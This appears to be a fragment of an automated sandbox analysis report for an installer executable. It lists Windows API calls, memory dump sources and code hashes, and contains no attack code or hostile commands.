                                                                                                              • SetCursor.USER32(00000000), ref: 0040473C
                                                                                                              • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040476B
                                                                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040477D
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                              • String ID: Call$N
                                                                                                              • API String ID: 3103080414-3438112850
                                                                                                              • Opcode ID: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
                                                                                                              • Instruction ID: 26ae409e5f73424340e4bb55f347a499eb46e427c8d4328441e026d38e95c6c2
                                                                                                              • Opcode Fuzzy Hash: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
                                                                                                              • Instruction Fuzzy Hash: 4B6173B1900209BFDB109F60DD85EAA7B69FB84314F00853AFB05772E0D7789D52CB58
                                                                                                              APIs
                                                                                                              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                              • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                              • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                              • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                              • DrawTextW.USER32(00000000,00429240,000000FF,00000010,00000820), ref: 00401156
                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                              • DeleteObject.GDI32(?), ref: 00401165
                                                                                                              • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                              • String ID: F
                                                                                                              • API String ID: 941294808-1304234792
                                                                                                              • Opcode ID: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                                                                              • Instruction ID: b35030fe9107d9a8359b932f7918d2348922827c9ca57aaae851fe5b21190c6b
                                                                                                              • Opcode Fuzzy Hash: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                                                                              • Instruction Fuzzy Hash: 92418A71800249AFCF058FA5DE459AFBBB9FF44310F00842AF991AA1A0C738E955DFA4
                                                                                                              APIs
                                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004061CF,?,?), ref: 0040606F
                                                                                                              • GetShortPathNameW.KERNEL32(?,00426DC8,00000400), ref: 00406078
                                                                                                                • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                                                                                • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                                                                              • GetShortPathNameW.KERNEL32(?,004275C8,00000400), ref: 00406095
                                                                                                              • wsprintfA.USER32 ref: 004060B3
                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,004275C8,C0000000,00000004,004275C8,?,?,?,?,?), ref: 004060EE
                                                                                                              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 004060FD
                                                                                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406135
                                                                                                              • SetFilePointer.KERNEL32(0040A590,00000000,00000000,00000000,00000000,004269C8,00000000,-0000000A,0040A590,00000000,[Rename],00000000,00000000,00000000), ref: 0040618B
                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 0040619C
                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004061A3
                                                                                                                • Part of subcall function 00405EDE: GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\2CQ2zMn0hb.exe,80000000,00000003), ref: 00405EE2
                                                                                                                • Part of subcall function 00405EDE: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                              • String ID: %ls=%ls$[Rename]
                                                                                                              • API String ID: 2171350718-461813615
                                                                                                              • Opcode ID: a8f6130d4aa3065939d725957225dfc1b425243e5004b20d0867480790577512
                                                                                                              • Instruction ID: 8c4bc4cab4d3408e43c29de3b383fd3cef376d344e04ab2aaf2f470794b42cbb
                                                                                                              • Opcode Fuzzy Hash: a8f6130d4aa3065939d725957225dfc1b425243e5004b20d0867480790577512
                                                                                                              • Instruction Fuzzy Hash: 34313770200719BFD2206B619D48F6B3A6CEF45704F16043EFA46FA2D3DA3C99158ABD
                                                                                                              APIs
                                                                                                              • GetWindowLongW.USER32(?,000000EB), ref: 004043E3
                                                                                                              • GetSysColor.USER32(00000000), ref: 00404421
                                                                                                              • SetTextColor.GDI32(?,00000000), ref: 0040442D
                                                                                                              • SetBkMode.GDI32(?,?), ref: 00404439
                                                                                                              • GetSysColor.USER32(?), ref: 0040444C
                                                                                                              • SetBkColor.GDI32(?,?), ref: 0040445C
                                                                                                              • DeleteObject.GDI32(?), ref: 00404476
                                                                                                              • CreateBrushIndirect.GDI32(?), ref: 00404480
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                              • String ID:
                                                                                                              • API String ID: 2320649405-0
                                                                                                              • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                              • Instruction ID: 4d8d1a64c5805e8a020b3744e793f2033a9a6b6b0a681029562fed9dd316a9da
                                                                                                              • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                              • Instruction Fuzzy Hash: 722131715007049BCB319F68D948B5BBBF8AF81714B148A2EEE96E26E0D738D944CB54
                                                                                                              APIs
                                                                                                              • lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                              • lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                              • lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                              • SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                              • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                              • String ID:
                                                                                                              • API String ID: 2531174081-0
                                                                                                              • Opcode ID: d8bd542d8f5d0add287beae510a16995646733a1dc03fc5179ed0d48c47eb8dc
                                                                                                              • Instruction ID: e73fa1987b6059f35b704de59c80f6892b54c3d1ee51518932a2041d94d0b0cb
                                                                                                              • Opcode Fuzzy Hash: d8bd542d8f5d0add287beae510a16995646733a1dc03fc5179ed0d48c47eb8dc
                                                                                                              • Instruction Fuzzy Hash: BE21A171900558BACB119F95DD84ACFBFB5EF84314F10803AF904B22A1C3798A91CFA8
                                                                                                              APIs
                                                                                                              • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,75923420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
                                                                                                              • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
                                                                                                              • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,75923420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
                                                                                                              • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,75923420,004036EF,?,00000006,00000008,0000000A), ref: 00406706
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Char$Next$Prev
                                                                                                              • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                              • API String ID: 589700163-1201062745
                                                                                                              • Opcode ID: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                                                                                              • Instruction ID: ccb021e8c97aa0e4e9f296cc8cc4b0d2e06c32826977e33acd3911ee1a404cd3
                                                                                                              • Opcode Fuzzy Hash: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                                                                                              • Instruction Fuzzy Hash: E011C82580061295DB302B548C44B77A2E8EF55764F52843FE985B32C1EB7D5CE28ABD
                                                                                                              APIs
                                                                                                              • DestroyWindow.USER32(00000000,00000000), ref: 00402EA9
                                                                                                              • GetTickCount.KERNEL32 ref: 00402EC7
                                                                                                              • wsprintfW.USER32 ref: 00402EF5
                                                                                                                • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                                • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                                • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                                • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                              • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402F19
                                                                                                              • ShowWindow.USER32(00000000,00000005), ref: 00402F27
                                                                                                                • Part of subcall function 00402E72: MulDiv.KERNEL32(0001DFEE,00000064,000204C4), ref: 00402E87
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                              • String ID: ... %d%%
                                                                                                              • API String ID: 722711167-2449383134
                                                                                                              • Opcode ID: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
                                                                                                              • Instruction ID: c65c9f61eb329069142d3a49436c3393aeffd9891ae55f37d91fa0e4ac25720a
                                                                                                              • Opcode Fuzzy Hash: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
                                                                                                              • Instruction Fuzzy Hash: 1A016170941614EBC7226B60EE4DA9B7B68BB01745B50413FF841F12E0CAB84459DBEE
                                                                                                              APIs
                                                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404D35
                                                                                                              • GetMessagePos.USER32 ref: 00404D3D
                                                                                                              • ScreenToClient.USER32(?,?), ref: 00404D57
                                                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D69
                                                                                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D8F
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Message$Send$ClientScreen
                                                                                                              • String ID: f
                                                                                                              • API String ID: 41195575-1993550816
                                                                                                              • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                              • Instruction ID: ac2b37e4453cd55ff3643614bd1240a9a451636028a825994647dd398b99f398
                                                                                                              • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                              • Instruction Fuzzy Hash: 23015E71940218BADB00DB94DD85FFEBBBCAF95711F10412BBA50F62D0D7B499018BA4
                                                                                                              APIs
                                                                                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
                                                                                                              • wsprintfW.USER32 ref: 00402E45
                                                                                                              • SetWindowTextW.USER32(?,?), ref: 00402E55
                                                                                                              • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E67
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                                                                              • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                              • API String ID: 1451636040-1158693248
                                                                                                              • Opcode ID: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
                                                                                                              • Instruction ID: 1bfa7b94c56a1c823be81e007cf4dd9dcc28a4463181553f30e61efe61dd31fb
                                                                                                              • Opcode Fuzzy Hash: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
                                                                                                              • Instruction Fuzzy Hash: 30F0317064020CABDF206F60DD4ABEE3B69EB40319F00803AFA45B51D0DBB999598F99
                                                                                                              APIs
                                                                                                                • Part of subcall function 6F97121B: GlobalAlloc.KERNELBASE(00000040,?,6F97123B,?,6F9712DF,00000019,6F9711BE,-000000A0), ref: 6F971225
                                                                                                              • GlobalFree.KERNEL32(?), ref: 6F972657
                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 6F97268C
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2420870069.000000006F971000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F970000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2420804552.000000006F970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2420903221.000000006F974000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2420959726.000000006F976000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_6f970000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Global$Free$Alloc
                                                                                                              • String ID:
                                                                                                              • API String ID: 1780285237-0
                                                                                                              • Opcode ID: f261d317266750affed246acaefd00cd64bb1436fa080e1c1cf280b535adabaf
                                                                                                              • Instruction ID: f64de98c2c158478d7a5b98748f0ef548b67ab32db57a6dff08c478c1e352772
                                                                                                              • Opcode Fuzzy Hash: f261d317266750affed246acaefd00cd64bb1436fa080e1c1cf280b535adabaf
                                                                                                              • Instruction Fuzzy Hash: 6031CB71928711DFDB348F68C898C2B7BBAFB87314310426BF241832A1CB31E9658F61
                                                                                                              APIs
                                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
                                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
                                                                                                              • GlobalFree.KERNEL32(?), ref: 00402956
                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00402969
                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
                                                                                                              • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                              • String ID:
                                                                                                              • API String ID: 2667972263-0
                                                                                                              • Opcode ID: ad54be54d1b33f2c3e643305ac3600c2e6c22dcacd93b56e136af0bf18fa41fc
                                                                                                              • Instruction ID: fa73a2a76dd28b4b8719808dd60f9f08d060129827b0ffc87b4efdc8f5ae5e12
                                                                                                              • Opcode Fuzzy Hash: ad54be54d1b33f2c3e643305ac3600c2e6c22dcacd93b56e136af0bf18fa41fc
                                                                                                              • Instruction Fuzzy Hash: 3D21BFB1D00124BBCF116FA5DE48D9E7E79EF09364F10023AF9607A2E1CB794D418B98
                                                                                                              APIs
                                                                                                              • lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                                                                              • wsprintfW.USER32 ref: 00404CB6
                                                                                                              • SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ItemTextlstrlenwsprintf
                                                                                                              • String ID: %u.%u%s%s$(7B
                                                                                                              • API String ID: 3540041739-1320723960
                                                                                                              • Opcode ID: c06007edea0c83b5e0931fd45a2cd42dabd82a11b0b4461ae96ab8921206da46
                                                                                                              • Instruction ID: eedca0a42859d703ec1426aadcab00983e9769f6aa36ce56d5d2522b0312c54d
                                                                                                              • Opcode Fuzzy Hash: c06007edea0c83b5e0931fd45a2cd42dabd82a11b0b4461ae96ab8921206da46
